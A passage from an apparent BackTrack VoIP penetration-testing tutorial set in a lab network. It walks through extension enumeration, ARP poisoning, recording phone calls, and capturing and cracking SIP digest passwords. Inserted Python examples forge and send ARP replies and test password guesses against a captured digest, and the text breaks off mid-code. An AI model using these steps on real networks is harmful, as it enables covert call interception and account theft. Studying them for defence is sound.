root@bt:/pentest/voip/enumiax# ./enumiax -v -m3 -M3 192.168.1.104
enumIAX 1.0
Dustin D. Trammell
Target Aquired: 192.168.1.104
Connecting to 192.168.1.104 via udp on port 4569...
Starting enum process at: Sat Feb 5 13:04:18 2011
Now working on 3 character usernames...
#################################
Trying username: "000"
#################################
Trying username: "001"
#################################
Trying username: "002"
#################################
Trying username: "003"
#################################
Trying username: "004"
#################################
Trying username: "005"
#################################
Trying username: "006"
#################################
Trying username: "007"
#################################
Trying username: "008"
#################################
...
root@bt:/pentest/voip/enumiax# ./enumiax -d dict -v 192.168.1.104
enumIAX 1.0
Dustin D. Trammell
Target Aquired: 192.168.1.104
Connecting to 192.168.1.104 via udp on port 4569...
Starting enum process at: Sat Feb 5 13:02:39 2011
#################################
Trying username: "guest"
#################################
Trying username: "iaxtel"
#################################
Trying username: "iaxtel2"
#################################
Trying username: "100"
#################################
Trying username: "101"
#################################
Trying username: "200"
#################################
Trying username: "201"
#################################
Trying username: "202"
#################################
Trying username: "203"
End of dictionary file reached, exiting.

Monitoring Traffic and Eavesdropping Phone calls

Monitoring VoIP traffic can allow an attacker to capture SIP requests and RTP data sent from clients to the server and back. It covers two attack vectors:
Capturing SIP authentication (we will later discuss this topic in the attacking authentication section).
Eavesdropping on users' phone calls.
For demonstration purposes we will use the following scenario:


For this attack vector we will need to perform a Man in The Middle attack, which will require the following steps:
ARP poisoning/spoofing
Sniffing traffic
Decoding RTP data to an audio file.

Arp Poisoning using Arpspoof

Before we can begin to sniff traffic we will need to ARP poison our switch/gateway. We'll be using a tool called Arpspoof, located in /usr/sbin/ in BackTrack; in fact you can just invoke it from anywhere by typing: arpspoof. Before we can use arpspoof we will need to enable IP forwarding, otherwise the victim's packets stop at our machine and the "monitoring" turns into a denial of service:

root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward

Arpspoof syntax should look as follows:
root@bt:~# arpspoof
Version: 2.4
Usage: arpspoof [-i interface] [-t target] host

For a successful MITM attack we will need to spoof both ways:
arpspoof -t victim gateway
arpspoof -t gateway victim

We will let our ARP poisoning run in the background while performing a capture using Wireshark.
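What the two arpspoof commands actually put on the wire is a stream of forged ARP replies, one per direction, each claiming that the other side's IP address lives at the attacker's MAC. The following is an added example, not code from the original article or from dsniff's arpspoof: it packs those two Ethernet/ARP frames by hand, decodes them back for inspection, and also builds the truthful "restore" replies that arpspoof sends when you stop it (the re-ARP step that UCSniff later warns about). The attacker MAC 00:0C:29:84:98:B2 / 192.168.1.105 and the victim 192.168.1.118 are taken from the article; the gateway address and the victim/gateway MACs are assumptions. Sending requires root and a raw socket, so it only happens when the script is run with --send.

```python
"""Build the poisoned ARP replies that 'arpspoof -t victim gateway' sends.

Added example, not code from the original article or from dsniff.
Addresses: attacker 00:0c:29:84:98:b2/192.168.1.105 and victim
192.168.1.118 from the article; the gateway 192.168.1.1 and both
victim/gateway MACs are assumptions.
"""
import socket
import struct
import sys
from typing import Tuple

ETH_P_ARP = 0x0806


def mac_bytes(mac: str) -> bytes:
    return bytes(int(x, 16) for x in mac.split(":"))


def build_arp_reply(attacker_mac: str, spoofed_ip: str,
                    target_mac: str, target_ip: str) -> bytes:
    """Ethernet frame carrying an ARP reply 'spoofed_ip is-at attacker_mac', sent to target."""
    eth = mac_bytes(target_mac) + mac_bytes(attacker_mac) + struct.pack("!H", ETH_P_ARP)
    # htype=1 (Ethernet), ptype=0x0800 (IPv4), hlen=6, plen=4, opcode=2 (reply)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2)
    arp += mac_bytes(attacker_mac) + socket.inet_aton(spoofed_ip)   # sender pair: the lie
    arp += mac_bytes(target_mac) + socket.inet_aton(target_ip)      # target pair: the victim
    return eth + arp


def decode_arp(frame: bytes) -> Tuple[str, str, str, str, int]:
    """Return (sender_mac, sender_ip, target_mac, target_ip, opcode) of an ARP frame."""
    if struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    opcode = struct.unpack("!H", frame[20:22])[0]
    fmt = lambda b: ":".join("%02x" % x for x in b)
    return (fmt(frame[22:28]), socket.inet_ntoa(frame[28:32]),
            fmt(frame[32:38]), socket.inet_ntoa(frame[38:42]), opcode)


def poison_pair(attacker_mac: str, victim_mac: str, victim_ip: str,
                gateway_mac: str, gateway_ip: str) -> Tuple[bytes, bytes]:
    """Both directions: the victim learns gateway_ip -> attacker, the gateway learns victim_ip -> attacker."""
    return (build_arp_reply(attacker_mac, gateway_ip, victim_mac, victim_ip),
            build_arp_reply(attacker_mac, victim_ip, gateway_mac, gateway_ip))


def restore_pair(victim_mac: str, victim_ip: str,
                 gateway_mac: str, gateway_ip: str) -> Tuple[bytes, bytes]:
    """Truthful replies to send on exit so the two hosts are not left pointing at a dead MAC."""
    return (build_arp_reply(gateway_mac, gateway_ip, victim_mac, victim_ip),
            build_arp_reply(victim_mac, victim_ip, gateway_mac, gateway_ip))


if __name__ == "__main__":
    attacker = "00:0c:29:84:98:b2"
    victim_mac, gateway_mac = "00:11:22:33:44:55", "00:aa:bb:cc:dd:ee"   # assumed
    frames = poison_pair(attacker, victim_mac, "192.168.1.118", gateway_mac, "192.168.1.1")
    for f in frames:
        print(decode_arp(f))
    if "--send" in sys.argv:   # Linux only, needs root; interface name is an assumption
        s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ARP))
        s.bind(("eth0", 0))
        for f in frames:
            s.send(f)
```

Because the frames are unsolicited replies with a made-up sender pair, they are also exactly what an ARP monitor (arpwatch, or dynamic ARP inspection on the switch) flags: a MAC/IP binding that contradicts the one it already holds.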

Capturing traffic and Eavesdropping using Wireshark
Now let's fire up Wireshark to capture some traffic. We will use the following Wireshark capture filter:

not broadcast and not multicast and host 192.168.1.118


Now let's start capturing some traffic. While sniffing for traffic, User B has launched the X-Lite softphone on his desktop computer and dialed user A's extension 200.

Wireshark has captured some traffic; after a while I have stopped the capture process and saved the session into a file called sip.pcap.

We can see that we have captured the SIP traffic, but for this section we are more interested in the RTP traffic because it contains the actual conversation data.

Wireshark has a pretty cool feature to decode captured VoIP call data into a playable audio format. You can find this feature under the Statistics > VoIP Calls menu.
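The "decode RTP to audio" step that Wireshark's VoIP Calls window (and VoIPong in the next section) performs is mechanical for G.711. The following is an added example, not code from the original article, Wireshark or VoIPong: it parses the 12-byte RTP header, puts one stream's packets back in sequence-number order (dropping duplicates), expands each µ-law byte (PCMU, payload type 0, as advertised in the sipsak SDP above) to a signed 16-bit sample and writes a mono 8 kHz WAV. The four RTP packets are constructed test data, not taken from a capture; the SSRC value is arbitrary.

```python
"""Turn captured RTP packets carrying G.711 µ-law (PCMU) into a WAV file.

Added example, not code from the original article, Wireshark or VoIPong.
The packets in SAMPLE_PACKETS are constructed test data.
"""
import struct
import wave
from typing import Dict, List, Tuple


def parse_rtp(packet: bytes) -> Tuple[Dict, bytes]:
    """Split an RTP packet into header fields and payload (RFC 3550 section 5.1)."""
    b0, b1, seq, ts, ssrc = struct.unpack("!BBHII", packet[:12])
    version, cc = b0 >> 6, b0 & 0x0F
    if version != 2:
        raise ValueError("not RTP version 2")
    hdr = {"pt": b1 & 0x7F, "marker": b1 >> 7, "seq": seq, "ts": ts, "ssrc": ssrc}
    offset = 12 + 4 * cc                    # skip the CSRC list if present
    if b0 & 0x10:                           # X bit: header extension present
        _, ext_len = struct.unpack("!HH", packet[offset:offset + 4])
        offset += 4 + 4 * ext_len
    payload = packet[offset:]
    if b0 & 0x20:                           # P bit: last byte gives padding length
        payload = payload[:-payload[-1]]
    return hdr, payload


def ulaw_to_pcm16(byte: int) -> int:
    """G.711 µ-law expansion: one encoded byte to a signed 16-bit linear sample."""
    b = ~byte & 0xFF
    sign, exponent, mantissa = b & 0x80, (b >> 4) & 0x07, b & 0x0F
    sample = (((mantissa << 3) + 0x84) << exponent) - 0x84
    return -sample if sign else sample


def rtp_stream_to_pcm(packets: List[bytes], payload_type: int = 0) -> bytes:
    """Reorder one SSRC's PCMU packets by sequence number and decode them to PCM."""
    parsed = [parse_rtp(p) for p in packets]
    parsed = [(h, d) for h, d in parsed if h["pt"] == payload_type]
    if not parsed:
        return b""
    ssrc = parsed[0][0]["ssrc"]             # one call direction = one SSRC
    parsed = [(h, d) for h, d in parsed if h["ssrc"] == ssrc]
    # Sort by 16-bit sequence number relative to the lowest one seen (handles wrap-around).
    first = min(h["seq"] for h, _ in parsed)
    parsed.sort(key=lambda hd: (hd[0]["seq"] - first) & 0xFFFF)
    seen, pcm = set(), bytearray()
    for h, data in parsed:
        if h["seq"] in seen:                # retransmitted duplicate, skip it
            continue
        seen.add(h["seq"])
        for byte in data:
            pcm += struct.pack("<h", ulaw_to_pcm16(byte))
    return bytes(pcm)


def write_wav(path: str, pcm: bytes, rate: int = 8000) -> None:
    """Write 16-bit mono PCM as a WAV file playable with any sound player."""
    with wave.open(path, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(2)
        w.setframerate(rate)
        w.writeframes(pcm)


def make_packet(seq: int, ts: int, payload: bytes, ssrc: int = 0xDEADBEEF, pt: int = 0) -> bytes:
    """Constructed RTP packet: version 2, no padding, extension or CSRCs."""
    return struct.pack("!BBHII", 0x80, pt, seq, ts, ssrc) + payload


# Constructed capture: 20 ms PCMU frames (160 samples each) delivered out of order.
SAMPLE_PACKETS = [
    make_packet(2, 320, bytes([0xFF]) * 160),   # µ-law 0xFF decodes to 0 (silence)
    make_packet(1, 160, bytes([0x00]) * 160),   # loudest negative sample
    make_packet(1, 160, bytes([0x00]) * 160),   # duplicate of seq 1, must be dropped
    make_packet(3, 480, bytes([0x80]) * 160),   # loudest positive sample
]

if __name__ == "__main__":
    pcm = rtp_stream_to_pcm(SAMPLE_PACKETS)
    write_wav("call.wav", pcm)
    print("wrote call.wav with %d samples" % (len(pcm) // 2))
```

A real capture carries two SSRCs per call (one per direction); run the function once per SSRC and mix or concatenate the results, which is what the "both" files produced by UCSniff below are. G.729 (payload type 18) needs a licensed or third-party codec and is not covered here.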


VoIPong

VoIPong is a utility which detects all Voice over IP calls on a pipeline, and for those which are G.711 encoded, dumps the actual conversation to separate wave files. It supports SIP, H323, Cisco's Skinny Client Protocol, RTP and RTCP. VoIPong is located in the BackTrack /pentest/voip/voipong directory. Before we can use VoIPong we will need to make some changes to the voipong.conf file:

root@bt:/pentest/voip/voipong# nano etc/voipong.conf
soxpath = /usr/bin/sox
networksfile = /pentest/voip/voipong/etc/voipongnets
outdir = /pentest/voip/voipong/output/
device = eth0 # your network interface card name

Now we can start VoIPong to capture some VoIP conversations:
root@bt:/pentest/voip/voipong# ./voipong -c etc/voipong.conf -d4 -f

Once VoIPong detects a phone call it will start to capture it; once the call finishes, VoIPong will stop the capture process and will render a playable wave file. All conversations will be saved into the /pentest/voip/voipong/output folder.

Playing the file:

Vomit

Vomit converts a Cisco IP phone RTP conversation into a wave file that can be played with ordinary sound players. Vomit requires a tcpdump output file. In order to get vomit up and running we will need to download and install waveplay. Get it here:
http://dir.filewatcher.com/d/FreeBSD/distfiles/Other/waveplay-20010924.tar.gz.5731.html

root@bt:~# tar xzvf waveplay-20010924.tar.gz
waveplay-20010924/
waveplay-20010924/Makefile
waveplay-20010924/waveplay.c
waveplay-20010924/waveplay.ja.1
waveplay-20010924/wavefmt.h
waveplay-20010924/README
waveplay-20010924/waveplay.1
waveplay-20010924/README.jp
root@bt:~# cd waveplay-20010924
root@bt:~/waveplay-20010924# make
cc -c -o waveplay.o waveplay.c
cc waveplay.o -o waveplay
root@bt:~/waveplay-20010924# cp waveplay /usr/bin/
root@bt:/pentest/voip/vomit# ./vomit -r sip.dump | waveplay -S 8000 -B 16 -C 1

UCsniff

UCSniff is a VoIP & IP Video Security Assessment tool that integrates existing open source software into several useful features, allowing VoIP and IP Video owners and security professionals to rapidly test for the threat of unauthorized VoIP and Video eavesdropping. UCSniff supports ARP poisoning, VLAN hopping and VLAN discovery via CDP, it has sniffer capabilities and more; I consider it an all in one eavesdropping tool. Let's take a look at some usage examples:
UCSniff can operate in 2 modes:

Monitor mode - Should be used on a shared medium the IP phones are connected to, i.e. a HUB or a wireless access point; it can also be used in a switched environment by setting up a SPAN session on a Cisco switch.
Man in the middle mode - This mode has 2 additional modes, which are:
Learning Mode
Targeted Mode
Preparing UCSniff so we can run it from any location in BackTrack:

root@bt:/tmp# cd /pentest/voip/ucsniff/
root@bt:/pentest/voip/ucsniff# ./configure
root@bt:/pentest/voip/ucsniff# make
root@bt:/pentest/voip/ucsniff# make install

Monitor Mode Usage

root@bt:/tmp/ucsniff# ucsniff -i eth0 -M
UCSniff 2.1 starting
Running in Monitor Mode
File directory users.txt can't be opened for reading in working directory
File targets.txt can't be opened for reading in working directory
Listening on eth0... (Ethernet)
eth0 -> 00:0C:29:84:98:B2 192.168.1.105 255.255.255.0
Starting Unified sniffing...
Warning: Please ensure that you hit 'q' when you are finished with this program.
Warning: 'q' re-ARPs the victims. Failure to do so before program exit will result in a DoS.
SIP Call in progress. (extension 200, ip 192.168.1.104) calling (extension 201, ip 192.168.1.118)
SIP Call in progress. (extension 200, ip 192.168.1.105) calling (extension 201, ip 192.168.1.104)
SIP Call ended. Conversation recorded in file '200-Calling-201-5:2:73-both.wav'
SIP Call ended. Conversation recorded in file '200-Calling-201-5:2:82-both.wav'
Closing text interface...
Unified sniffing was stopped.

We can stop the session by pressing the Q key.

Several files were created by UCSniff: log files containing detailed information about SIP transactions, pcap files of the captured traffic which can be viewed in Wireshark, and wav files of the conversation audio.

root@bt:/tmp/ucsniff# ls -l
total 376
-rw-r--r-- 1 root root  40854 Feb  5 05:02 200-Calling-201-5:2:73-both.wav
-rw-r--r-- 1 root root 115818 Feb  5 05:02 200-Calling-201-5:2:73.pcap
-rw-r--r-- 1 root root  46294 Feb  5 05:02 200-Calling-201-5:2:82-both.wav
-rw-r--r-- 1 root root 103940 Feb  5 05:02 200-Calling-201-5:2:82.pcap
-rw-r--r-- 1 root root    278 Feb  5 05:02 call_detail_log
-rw-r--r-- 1 root root    317 Feb  5 05:02 call_log
-rw-r--r-- 1 root root  10063 Feb  5 05:02 sip.log
-rw-r--r-- 1 root root  39073 Feb  5 05:02 sipdump.pcap
-rw-r--r-- 1 root root      0 Feb  5 05:01 skinny_log

MITM Learning Mode Usage

This mode uses a signaling protocol (SIP, Skinny) to map extensions to IP addresses. You can customize the targets to intercept specific IP addresses or networks. In the following example we assume we are on the VoIP VLAN; UCSniff will ARP poison all hosts on the subnet.

root@bt:/tmp/ucsniff# ucsniff -i eth0 // //
UCSniff 2.1 starting
Listening on eth0... (Ethernet)
eth0 -> 00:0C:29:84:98:B2 192.168.1.105 255.255.255.0
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %
ARP poisoning victims:
GROUP 1 : ANY (all the hosts in the list)
GROUP 2 : ANY (all the hosts in the list)
Mapped new target entry: (IP: 192.168.1.118) -> extension 201 and name:
Mapped new target entry: (IP: 192.168.1.104) -> extension 200 and name:
SIP Call in progress. (extension 201, ip 192.168.1.118) calling (extension 200, ip 192.168.1.104)
SIP Call ended. Conversation recorded in file '201-Calling-200-5:13:42-both.wav'
Closing text interface...
ARP poisoner deactivated.
RE-ARPing the victims...
Unified sniffing was stopped.

If we take a look at the UCSniff log files we can see the discovered targets used in the attack.
root@bt:/tmp/ucsniff# cat targets.txt
192.168.1.118,201,,sip
192.168.1.104,200,,sip

MITM Target Mode

Target Mode enables eavesdropping at a layer higher than just random audio streams or the IP addresses of phones: you only need to know the extension. This mode has 2 sub modes: Targeted User and Targeted Conversation. We can add targets manually to the targets.txt file in the following format: x.x.x.x,extension,,sip (for example 192.168.1.118,201,,sip), or use learning mode to auto discover them.

root@bt:/tmp/ucsniff# ucsniff -i eth0 -T
UCSniff 2.1 starting
File targets.txt can't be opened for reading in working directory
No targets have been previously discovered in Targets file, targets.txt
Please run UCSniff in learning mode, or manually edit targets.txt

Once a valid targets.txt file is found you will be asked to choose an eavesdropping mode:
root@bt:/tmp/ucsniff# ucsniff -i eth0 -T
UCSniff 2.1 starting
Parsed 2 entries in Targets file, targets.txt
UCSniff running in target mode. Parsed 2 previously discovered targets
Please select a Targeted Eavesdropping Mode:
1. User
   Description: Eavesdrop on all calls to or from a particular endpoint.
2. Conversation
   Description: Eavesdrop on bidirectional conversation flows between two selected endpoints.
Please select option (1) or (2):


Selecting "User" tells the tool to intercept all traffic between the one target and the rest of the network.

In "Conversation", two endpoints are selected and the network is ARP poisoned to only intercept the traffic between those two.

UCSniff includes more useful tools and attack modes like VLAN hopping (using ACE), which will be discussed later.

Xplico

Although Xplico is not in the BackTrack VoIP tools directory, it is a very useful tool for capturing SIP and RTP traffic (among other protocols). Xplico can be found in the Backtrack > Digital Forensics > Forensic Analysis menu.

In case it is not present on your BackTrack installation you can simply install it by issuing the following command:

root@bt:~# apt-get install xplico


Xplico can be used to capture live traffic or to import a Wireshark PCAP capture file. Either way Xplico will decode the captured packets and assemble them into the appropriate format; in our case that will be SIP and RTP. After executing Xplico you will be asked to log in; the default username and password are: xplico

Once we have successfully logged into Xplico we will need to create a case.

We will be asked to choose between a live capture or importing a PCAP file. In this example we will use Xplico to perform a live capture (we will ARP poison our targets in the background using arpspoof). Now we will have to choose our case and create a new session.

By choosing our newly created session we will see our main statistics page with the option to choose our network adapter and start/stop the capture process.


Here is an example of captured SIP traffic:

An example of RTP decoded traffic:


Capturing SIP Authentication using SIPDump

SIPDump is a part of the SIPCrack tools suite; it allows performing a live capture of SIP authentication digest responses or dumping a previously captured session from a PCAP file. SIPDump Usage:

root@bt:/pentest/voip/sipcrack# ./sipdump -i eth0
SIPdump 0.3 ( MaJoMu | www.codito.de )

Usage: sipdump [OPTIONS] <dump file>
       <dump file>    = file where captured logins will be written to
       Options:
       -i <interface> = interface to listen on
       -p <file>      = use pcap data file
       -m             = enter login data manually
       -f "<filter>"  = set libpcap filter
* You need to specify dump file

Live capture using SIPDump:
root@bt:/pentest/voip/sipcrack# ./sipdump -i eth0 auth.txt
SIPdump 0.3 ( MaJoMu | www.codito.de )

* Using dev 'eth0' for sniffing
* Starting to sniff with packet filter 'tcp or udp or vlan'
* Dumped login from 192.168.1.104 -> 192.168.1.111 (User: '200')
* Dumped login from 192.168.1.104 -> 192.168.1.111 (User: '200')
* Dumped login from 192.168.1.104 -> 192.168.1.111 (User: '200')

Dumping authentication data from a PCAP file:
root@bt:/pentest/voip/sipcrack# ./sipdump -p /root/registration.pcap auth.txt
SIPdump 0.3 ( MaJoMu | www.codito.de )

* Using pcap file '/root/registration.pcap' for sniffing
* Starting to sniff with packet filter 'tcp or udp or vlan'
* Dumped login from 192.168.1.104 -> 192.168.1.101 (User: '200')
* Exiting, sniffed 1 logins

SIPDump will write the authentication challenge response to the specified file, which looks as follows:
192.168.1.111"192.168.1.104"200"asterisk"REGISTER"sip:192.168.1.104"44b80d16""""MD5"8edc2d549294f6535070439fb069c968
192.168.1.111"192.168.1.104"200"asterisk"REGISTER"sip:192.168.1.104"46cce857""""MD5"4dfc7515936a667565228dbaa0293dfc
192.168.1.111"192.168.1.104"200"asterisk"REGISTER"sip:192.168.1.104"2252e8fe""""MD5"5b895c6ae07ed8391212119aab36f108


We will discuss cracking these challenges in the attacking authentication chapter.

Attacking Authentication

SIP can be susceptible to 2 types of authentication attacks. Before we take a look at these attack types, let's understand how the registration and authentication process takes place. SIP uses digest authentication, the same mechanism that HTTP uses, known as HTTP digest. Because SIP is an ASCII based protocol, the authentication details are hashed in order to avoid transporting them in clear text. Note that hashing only keeps the password itself off the wire: as the next section shows, a captured digest can still be attacked offline by guessing, which is why the strength of the password matters. When a SIP client (User Agent) wants to authenticate with a SIP server, the server generates and sends a digest challenge to the client. It contains the following parameters:

Realm: used to identify credentials within a SIP message, usually it is the sip domain.
Nonce: this is an md5 unique string which is generated by the server for each registration request. It is made from a timestamp and a secret phrase to ensure it has a limited lifetime and cannot be used again.

Once the client receives the digest challenge and the user enters his credentials, the client uses the nonce to generate a digest response and sends it back to the server.
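The challenge/response just described, worked through in Python as an added example (this is not code from the original article, from SIPcrack or from Asterisk). It implements the MD5 digest without qop, which is what the sipdump records shown earlier carry (the empty cnonce, nc and qop fields); it shows a server issuing a time-bound nonce and checking its freshness (the timestamp-plus-MAC scheme is an illustrative assumption, not Asterisk's own construction); and it parses one sipdump record copied from this page to show that the nonce does not protect a weak password from an offline guess. The sipdump field order is inferred from the records on this page.

```python
"""SIP digest authentication worked through end to end.

Added example, not code from the original article, from SIPcrack or from
Asterisk.  Implements the MD5 digest without qop (RFC 2617 as used by
RFC 3261), which matches the sipdump records on this page (empty cnonce,
nc and qop fields).  The server-side nonce scheme (timestamp plus a MAC
under a server secret) is an illustrative assumption, not Asterisk's own.
"""
import hashlib
import hmac
import time


def md5hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def make_nonce(server_secret, now=None):
    """Server side: nonce = timestamp:MAC(secret, timestamp).  The timestamp
    bounds the nonce lifetime, the MAC lets the server reject nonces it did
    not issue, so a captured response cannot simply be replayed later."""
    ts = str(int(time.time()) if now is None else now)
    mac = hmac.new(server_secret, ts.encode(), "md5").hexdigest()[:16]
    return f"{ts}:{mac}"


def nonce_is_fresh(nonce, server_secret, max_age=60, now=None):
    """Server side: accept only nonces we issued within max_age seconds."""
    ts, _, mac = nonce.partition(":")
    if not ts.isdigit():
        return False
    expected = hmac.new(server_secret, ts.encode(), "md5").hexdigest()[:16]
    if not hmac.compare_digest(mac, expected):
        return False
    now = int(time.time()) if now is None else now
    return 0 <= now - int(ts) <= max_age


def digest_response(user, realm, password, method, uri, nonce):
    """Client side (and what the server recomputes to verify the client)."""
    ha1 = md5hex(f"{user}:{realm}:{password}")
    ha2 = md5hex(f"{method}:{uri}")        # the "static" hash in SIPcrack's output
    return md5hex(f"{ha1}:{nonce}:{ha2}")


# Field order inferred from the three records shown on this page.
SIPDUMP_FIELDS = ("server", "client", "user", "realm", "method", "uri",
                  "nonce", "cnonce", "nc", "qop", "algorithm", "response")


def parse_sipdump_line(line):
    """Split one sipdump record (double-quote separated) into a dict."""
    parts = line.strip().split('"')
    if len(parts) != len(SIPDUMP_FIELDS):
        raise ValueError(f"expected {len(SIPDUMP_FIELDS)} fields, got {len(parts)}")
    rec = dict(zip(SIPDUMP_FIELDS, parts))
    if rec["qop"] or rec["algorithm"] != "MD5":
        raise ValueError("only MD5 without qop is handled here")
    return rec


def password_matches(rec, candidate):
    """Offline check of one candidate against a captured record.  This is
    why a sniffed digest matters: the nonce stops replay, not guessing."""
    expected = digest_response(rec["user"], rec["realm"], candidate,
                               rec["method"], rec["uri"], rec["nonce"])
    return hmac.compare_digest(expected, rec["response"])


# First record of the sipdump output shown on this page.
PAGE_RECORD = ('192.168.1.111"192.168.1.104"200"asterisk"REGISTER"sip:192.168.1.104'
               '"44b80d16""""MD5"8edc2d549294f6535070439fb069c968')

if __name__ == "__main__":
    rec = parse_sipdump_line(PAGE_RECORD)
    print(f"user={rec['user']} realm={rec['realm']} nonce={rec['nonce']}")
    print("candidate '123456' matches:", password_matches(rec, "123456"))
```

Run stand-alone it parses the page's record and reports whether the candidate reproduces the captured response. The two defensive levers are visible in the code: the nonce check limits replay and nothing else, so the account password must resist guessing, and the record only exists because the REGISTER crossed the wire in clear text, which is what transporting SIP over TLS prevents.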

With that said, let's try to crack the digest response in order to obtain a valid SIP account password.

Cracking SIP Digest response hashes

Backtrack provides a great tool called SIPCrack. We already discussed how to capture a valid SIP authentication digest response using SIPDump. SIPCrack can be found in

root@bt:/pentest/voip/sipcrack#

SIPCrack Usage:

root@bt:/pentest/voip/sipcrack# ./sipcrack
SIPcrack 0.3 ( MaJoMu | www.codito.de )

Usage: sipcrack [OPTIONS] [ -s | -w <wordlist> ] <dump file>
       <dump file>   = file containing logins sniffed by SIPdump
       Options:
       -s            = use stdin for passwords
       -w <wordlist> = file containing all passwords to try
       -p <num>      = print cracking process every n passwords (for -w)
                       (ATTENTION: slows down heavily)
* Either -w or -s has to be given

SIPCrack can operate in two modes:
Dictionary attack
STDIN

Dictionary attack
Backtrack provides some basic dictionaries which are located in:

root@bt:/pentest/passwords/wordlists

But for the purpose of this article I will use another great tool in backtrack called Crunch, which is used to create custom dictionaries. Let's use crunch to create a six character numeric dictionary. Crunch is located in:
root@bt:/pentest/passwords/crunch#

Crunch Usage:
usage: crunch <min-len> <max-len> [-f /path/to/charset.lst charset-name] [-o wordlist.txt] [-t [FIXED]@@@@] [-s startblock] [-c number]

For detailed crunch usage check its manual:
root@bt:/pentest/passwords/crunch# man crunch

Creating a six chars numeric dictionary:

root@bt:/pentest/passwords/crunch# ./crunch 6 6 -f charset.lst numeric -o /pentest/voip/sipcrack/sipass.txt
Crunch will now generate 7000000 bytes of data
Crunch will now generate 6 MB of data
Crunch will now generate 0 GB of data
100%

We will use the previously captured sip credentials stored by SIPDump in the auth.txt file and sipass.txt as the dictionary (which we created using crunch).

Cracking the Digest Response:

root@bt:/pentest/voip/sipcrack# ./sipcrack -w sipass.txt auth.txt
SIPcrack 0.3 ( MaJoMu | www.codito.de )

* Found Accounts:
Num  Server         Client         User  Hash|Password
1    192.168.1.101  192.168.1.104  200   3a33e768ed6f630347f4b511371926bd
* Select which entry to crack (1 - 1): 1
* Generating static MD5 hash... 0a84f78fde66bb15197eab961462dc2f
* Starting bruteforce against user '200' (MD5: '3a33e768ed6f630347f4b511371926bd')
* Loaded wordlist: 'sipass.txt'
* Starting bruteforce against user '200' (MD5: '3a33e768ed6f630347f4b511371926bd')
* Tried 123457 passwords in 0 seconds
* Found password: '123456'
* Updating dump file 'auth.txt'... done

Brute Force attack using John The Ripper

For this attack mode we will be using John the Ripper and redirect john's output into a FIFO file which we'll feed into SIPCrack. Creating a FIFO file:

root@bt:/tmp# mkfifo sipcrack

Generating passwords using john and redirecting the output to our FIFO file; for this example we will generate up to 6 digits:
root@bt:~# john
[*] This script will take you to /pentest/passwords/jtr/
[*] From there, run ./john
root@bt:/pentest/passwords/jtr# ./john --incremental=digits --stdout=6 > /tmp/sipcrack

Using our FIFO file to crack the password:
root@bt:/pentest/voip/sipcrack# ./sipcrack -w /tmp/sipcrack auth.txt
SIPcrack 0.3 ( MaJoMu | www.codito.de )

* Found Accounts:
Num  Server         Client         User  Hash|Password
1    192.168.1.111  192.168.1.104  200   8edc2d549294f6535070439fb069c968
* Select which entry to crack (1 - 1): 1
* Generating static MD5 hash... 0a84f78fde66bb15197eab961462dc2f
* Starting bruteforce against user '200' (MD5: '8edc2d549294f6535070439fb069c968')
* Loaded wordlist: '/tmp/sipcrack'
* Starting bruteforce against user '200' (MD5: '8edc2d549294f6535070439fb069c968')
* Tried 3 passwords in 0 seconds
* Found password: '123456'
* Updating dump file 'auth.txt'... done

Bruteforcing SIP Accounts

We can use svcrack, which is a part of the sipvicious tools suite, to bruteforce SIP accounts. A single SIP account dictionary attack (you can add a -v or -vv for verbosity):

root@bt:/pentest/voip/sipvicious# ./svcrack.py -u 200 -d wordlist.txt 192.168.1.104
| Extension | Password |
------------------------
| 200       | 123456   |

A single SIP account bruteforcing:

root@bt:/pentest/voip/sipvicious# ./svcrack.py -u 200 -r 100000-999999 192.168.1.104
| Extension | Password |
------------------------
| 200       | 123456   |

Use ./svcrack.py -h for all available arguments.

VLAN Hopping

Usually VoIP traffic is connected to a dedicated VLAN (Virtual LAN), as we saw in the topologies section. This means that we cannot intercept the VoIP traffic by sniffing and ARP poisoning. The reason for that is that a VLAN is like a separate network, with its own broadcast domain and a different IP range than the data network. VLAN hopping is a way to hop to another VLAN, and Backtrack includes the necessary tools to perform this attack. One common topology is where the IP Phone has a built-in internal switch; usually the PC is plugged into the phone's PC socket and the phone is connected from its LAN/SW socket to the network switch, as follows:

A typical CISCO switch port configuration for VoIP will look something like:

Switch# conf t
Enter configuration commands, one per line. End with CNTL/Z.


Switch(config)# interface fastEthernet 0/1
Switch(config-if)# switchport mode access
Switch(config-if)# switchport access vlan 10
Switch(config-if)# switchport voice vlan 20

The IP phone will be configured with the appropriate VLAN ID (20) and the PC data traffic will flow through VLAN 10. To begin hopping around we will have to enable support for the 802.1q protocol in Backtrack by typing:
root@bt:~# modprobe 8021q
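The 802.1Q tagging that separates VLAN 10 from VLAN 20 in the configuration above, as an added Python example (not from the original article or from any of the tools it describes): it builds and parses tagged Ethernet frames and audits which source MACs appear on the voice VLAN, flagging any that are not on a phone inventory. The VLAN numbers are the ones from the switch configuration; the frames, the inventory and the MAC addresses are constructed for the example (the MACs reuse values that appear in tool output later on this page), so it runs offline without a capture interface.

```python
"""Audit 802.1Q tags: who is sending on the voice VLAN?

Added example, not from the original article or the tools it describes.
Builds and parses tagged Ethernet frames and reports source MACs seen on the
voice VLAN that are not on the phone inventory.  VLAN numbers come from the
switch configuration above; frames, inventory and MAC addresses are
constructed for the example (the MACs reuse values that appear in tool
output later on this page).
"""
import struct

DATA_VLAN = 10
VOICE_VLAN = 20
TPID_8021Q = 0x8100          # EtherType value that announces an 802.1Q tag


def build_frame(dst, src, vlan, ethertype=0x0800, payload=b""):
    """Construct a frame; vlan=None produces an untagged frame."""
    hdr = bytes.fromhex(dst.replace(":", "")) + bytes.fromhex(src.replace(":", ""))
    if vlan is not None:
        tci = (5 << 13) | (vlan & 0x0FFF)     # PCP 5 is the usual voice priority
        hdr += struct.pack("!HH", TPID_8021Q, tci)
    return hdr + struct.pack("!H", ethertype) + payload


def parse_frame(frame):
    """Return (dst, src, vlan_id or None, ethertype) from a raw frame."""
    if len(frame) < 14:
        raise ValueError("truncated Ethernet header")
    dst = ":".join(f"{b:02x}" for b in frame[0:6])
    src = ":".join(f"{b:02x}" for b in frame[6:12])
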